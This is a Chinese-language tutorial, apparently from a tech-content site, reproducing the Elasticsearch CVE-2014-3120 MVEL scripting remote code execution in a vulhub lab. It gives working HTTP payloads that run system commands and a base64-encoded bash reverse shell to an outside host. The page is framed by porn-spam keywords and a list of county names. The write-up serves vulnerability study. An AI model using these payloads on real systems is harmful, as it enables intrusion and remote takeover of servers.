中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

怎么實現ElasticSearch 遠程代碼執行漏洞CVE-2014-3120復現的分析

發布時間:2021-12-16 18:27:19 來源:億速云 閱讀:606 作者:柒染 欄目:安全技術

本篇文章給大家分享的是有關怎么實現ElasticSearch 遠程代碼執行漏洞CVE-2014-3120復現的分析,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。

Elasticsearch是一個基于Lucene的搜索服務器。它提供了一個分布式多用戶能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java語言開發的,并作為Apache許可條款下的開放源碼發布,是一種流行的企業級搜索引擎。

ElasticSearch有腳本運行的功能,能夠非常方便地對查詢出來的數據再加工處理。  ElasticSearch用的腳本引擎是MVEL,這個引擎沒有做什么的防護,所以直接能夠運行隨意代碼。  而在ElasticSearch里,默認配置是打開動態腳本功能的,因此用戶能夠直接通過http請求,運行隨意代碼。

ElasticSearch版本: v1.1.1

僅作漏洞復現記錄與實現,利用流程如下:

一、漏洞環境搭建

本文漏洞環境采用vulhub搭建,執行以下命令開啟環境

cd /elasticsearch/CVE-2014-3120

docker-compose build

docker-compose up -d

執行完畢后訪問9200端口,顯示如下

怎么實現ElasticSearch 遠程代碼執行漏洞CVE-2014-3120復現的分析

漏洞鏈接: http://192.168.101.152:9200/

二、漏洞利用過程

利用該漏洞首先需要ElasticSearch存在至少一條數據,發送以下數據包添加數據

POST /website/blog/  HTTP/1.1
Host: 192.168.91.130:9200
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Length: 27

{
 "name": "colleget"
}

怎么實現ElasticSearch 遠程代碼執行漏洞CVE-2014-3120復現的分析

返回201狀態碼代表添加成功,之后發送以下數據包,執行命令

POST /_search?pretty HTTP/1.1
Host: 192.168.91.130:9200
Content-Type: application/x-www-form-urlencoded
Content-Length: 366

{
  "size": 1,
  "query": {
    "filtered": {
      "query": {
        "match_all": {
        }
      }
    }
  },
  "script_fields": {
      "command": {
          "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
      }
  }
}
  }
}

怎么實現ElasticSearch 遠程代碼執行漏洞CVE-2014-3120復現的分析

可以看到執行結果回顯,接下來是反彈shell,為了方便寫了個腳本

先在dnslog上獲取域名,執行命令后判斷目標可出網

怎么實現ElasticSearch 遠程代碼執行漏洞CVE-2014-3120復現的分析

怎么實現ElasticSearch 遠程代碼執行漏洞CVE-2014-3120復現的分析

之后在服務器上執行nc -lvvp 1234,監聽端口,再執行命令

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}

怎么實現ElasticSearch 遠程代碼執行漏洞CVE-2014-3120復現的分析

稍等一會兒就可以看到shell反彈到服務器上了

怎么實現ElasticSearch 遠程代碼執行漏洞CVE-2014-3120復現的分析

以上就是怎么實現ElasticSearch 遠程代碼執行漏洞CVE-2014-3120復現的分析,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

高陵县| 罗定市| 雅安市| 绥芬河市| 墨脱县| 兴国县| 湛江市| 静安区| 昌乐县| 山阴县| 霍州市| 且末县| 峨边| 二手房| 邓州市| 富平县| 大丰市| 西宁市| 灵璧县| 和田县| 临安市| 京山县| 中卫市| 南汇区| 上犹县| 隆回县| 临高县| 古浪县| 都兰县| 宝鸡市| 璧山县| 深圳市| 湛江市| 宜兴市| 潞城市| 西乡县| 平江县| 防城港市| 灵璧县| 陇西县| 荥经县|